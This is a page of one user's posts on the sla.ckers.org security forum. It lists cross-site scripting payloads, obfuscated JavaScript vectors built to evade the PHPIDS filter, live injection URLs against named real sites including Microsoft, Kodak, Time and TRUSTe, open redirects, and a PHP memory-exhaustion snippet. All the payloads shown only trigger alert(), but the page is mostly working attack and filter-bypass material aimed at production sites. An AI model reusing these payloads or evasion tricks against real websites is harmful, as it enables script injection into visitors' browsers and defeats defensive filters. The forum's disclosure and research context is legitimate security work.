Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 38
6 years ago
C1c4Tr1Z
@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)
Forum: Projects
6 years ago
C1c4Tr1Z
@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us: a=alert,a(0) I was playing with something like this, but his impact is 35.:D a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0) bye!
Forum: Projects
6 years ago
C1c4Tr1Z
I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize it: a>>/al/+/ert/|a(0) Thanks! EDIT: This vector doesn't seems to work! My browser is crazy :).
Forum: Projects
5 years ago
C1c4Tr1Z
Browser Security Handbook http://code.google.com/p/browsersec/ Google doctype's Web Security section http://code.google.com/p/doctype/wiki/ArticlesXSS
Forum: Obfuscation
5 years ago
C1c4Tr1Z
concat() also works: ({}=[].concat)()[0] == window
Forum: XSS Info
5 years ago
C1c4Tr1Z
Well, at least it's secure..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
jojo! nice magicmac. MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') " We love sarcasm.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)// I had to bypass something like this (;|+\(.*\))+ PS: Upss! It's McAfee SECURE!
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
And, Kodak: http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22 http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss @euronymous: http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
Thanks DoctorDan! I'll read it. I've found this also: http://applesoup.googlepages.com/bypass_filter.txt
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
Thi's is something weird.. hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all Tested on FF 3.0.3 (UTF-8)
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
@Kyo: mmm... that's weird. Because if you look at the source code, you will see that the syntax it's correct.
Forum: XSS Info
6 years ago
C1c4Tr1Z
FF3 Unix: http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=%22);%0Aa=alert,a(%22XSS
Forum: XSS Info
6 years ago
C1c4Tr1Z
I think that maybe WebScarab or the Burp suite have more features.
Forum: XSS Info
6 years ago
C1c4Tr1Z
I only have found some XSS but with POST requests. But if you are searching for bugs, there's a nice SQL Injection..
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I fuzzed the browser with UTF-7 and the only char that seems to give me a valid javascript execution is char 43.
Forum: XSS Info
6 years ago
C1c4Tr1Z
Just more easy functions: with(b={})if((b.c=function(){return'ale'})&&(b.a=function(){return'rt'}))eval(b.c()+b.a())(0); a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1),a(0) Tell me if one of them doesn't work :S
Forum: XSS Info
6 years ago
C1c4Tr1Z
Maybe just the whitelist, because a blacklist must be updated very often.
Forum: XSS Info
6 years ago
C1c4Tr1Z
Here, realpath() and other functions appears in this advisory of Hardened-PHP: http://www.hardened-php.net/advisory_012004.42.html
Forum: Projects
6 years ago
C1c4Tr1Z
Here are three functions that might like you: realpath() stream_set_write_buffer() is_writable() && is_readable()
Forum: Projects
6 years ago
C1c4Tr1Z
I was thinking in memory allocation or off-by-one exploits. For example: <?php /*PHP 4 < 4.4.5 and PHP 5 < 5.2.1*/ str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); ?>
Forum: Projects
6 years ago
C1c4Tr1Z
id Wrote: ------------------------------------------------------- > Ummmmm....they did let him, they just happened to > fix it later. Ohh, sorry.
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I've found that if you put something like this in the URI with Greasemonkey installed, the addon starts "Fetching user script": {;}.user.js And it seems that makes an infinite loop. Then, in the same tab/window, you write: http://www.foo.com/bar.user.js Greasemonkey recognizes the HTML source as a plugin for this addon, instead sending the normal "Error loading user scr
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I don't think that Yahoo! has no sense of security and let you inject so easy JS code. :S
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
Here's one, it's very simple but i didn't read it in the thread: <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>
Forum: XSS Info
6 years ago
C1c4Tr1Z
Another aol redirection: http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2